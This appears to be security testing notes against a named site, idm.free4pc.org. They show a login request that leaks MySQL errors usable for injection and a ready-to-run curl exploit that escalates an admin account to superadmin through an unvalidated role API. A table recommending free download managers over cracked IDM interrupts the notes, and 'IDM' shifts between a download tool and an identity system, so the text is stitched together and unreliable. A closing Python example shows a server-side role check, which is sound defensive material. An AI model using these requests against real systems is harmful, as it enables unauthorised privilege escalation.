POST /idm/login.php HTTP/1.1
Host: idm.free4pc.org
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=xyz123
username=admin@free4pc.org&password=invalid&csrf_token=abcd1234
Result: The server returns a MySQL error (SQLSTATE[HY000]: General error: 1366 Incorrect string value...) instead of a generic “Invalid credentials” message. This is error-based information leakage: the verbose database error confirms that the submitted input reaches the query, and it can be leveraged for injection.
If you cannot afford IDM, these are safer and completely free:
| Software | Features | Platform |
|----------|----------|----------|
| XDM (Xtreme Download Manager) | Thread splitting, video grabbing, resume broken downloads | Windows, Linux, macOS |
| Free Download Manager (FDM) | Torrent support, media preview, scheduler | Windows, macOS, Android |
| Motrix | Clean UI, supports up to 10 threads, no ads | Windows, Linux, macOS |
| uGet | Lightweight, clipboard monitoring, aria2 integration | Windows, Linux, macOS |
All of these outperform any cracked version of IDM and receive regular security updates.
The IDM has a role hierarchy:
| Role | Permissions |
|------|-------------|
| user | View own profile |
| admin | Manage users, view logs |
| superadmin (or top) | Edit system config, add/remove IDM modules |
The admin role can edit user roles via the /admin/users/edit.php?id=<uid> page. However, the role dropdown on that page only lists user and admin.
Discovery: An undocumented POST endpoint (/api/v1/users/<uid>/role) accepts a JSON body:
{"role": "superadmin"}
When called with a valid admin JWT, the server updates the role without any server-side validation of the requested value; the UI simply hides the superadmin option.
Exploit:
curl -X POST -H "Authorization: Bearer $JWT" \
-H "Content-Type: application/json" \
-d '{"role":"superadmin"}' \
https://idm.free4pc.org/api/v1/users/1/role
Result: The admin user’s role changes to superadmin. Refresh the admin console – a new System Settings menu appears, confirming “top‑level” access.
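The fix for this class of bug is to enforce the role hierarchy from the table above inside the API handler rather than in the dropdown. The following is an added example of such a check, not code from the site described on this page; the function and exception names, the status codes and the rule that an account can only be edited or granted roles at or below the actor's own rank are assumptions.

```python
import json

# Role hierarchy from the table above: a higher rank means more privilege.
ROLE_RANK = {"user": 0, "admin": 1, "superadmin": 2}


class BadRequest(Exception):
    """Request body is malformed or names a role that does not exist."""


class Forbidden(Exception):
    """Request is well-formed but the actor is not allowed to make the change."""


def parse_role_body(raw_body: str) -> str:
    """Parse the JSON body of a role-change request; only a string 'role' in ROLE_RANK is accepted."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        raise BadRequest("malformed JSON")
    if not isinstance(body, dict) or not isinstance(body.get("role"), str):
        raise BadRequest("missing role")
    if body["role"] not in ROLE_RANK:
        raise BadRequest("unknown role")
    return body["role"]


def authorize_role_change(actor_id, actor_role, target_id, target_role, new_role):
    """Enforce the hierarchy server-side instead of trusting the UI dropdown.

    Assumed rules: the actor may not change their own role, may only edit accounts
    ranked at or below their own role, and may only grant roles at or below their own.
    """
    if actor_role not in ROLE_RANK or target_role not in ROLE_RANK:
        raise Forbidden("unknown role")
    actor_rank = ROLE_RANK[actor_role]
    if actor_id == target_id:
        raise Forbidden("cannot change own role")
    if ROLE_RANK[target_role] > actor_rank:
        raise Forbidden("target outranks actor")
    if ROLE_RANK[new_role] > actor_rank:
        raise Forbidden("cannot grant a role above your own")


def handle_role_change(actor_id, actor_role, target_id, target_role, raw_body):
    """Return (HTTP status, generic message); internal error details are never echoed to the client."""
    try:
        new_role = parse_role_body(raw_body)
        authorize_role_change(actor_id, actor_role, target_id, target_role, new_role)
    except BadRequest:
        return 400, "bad request"
    except Forbidden:
        return 403, "forbidden"
    # Hypothetical persistence step: a real handler would update the user record here.
    return 200, "role updated"
```

The actor's id and role should come from the verified JWT claims, never from the request body or URL.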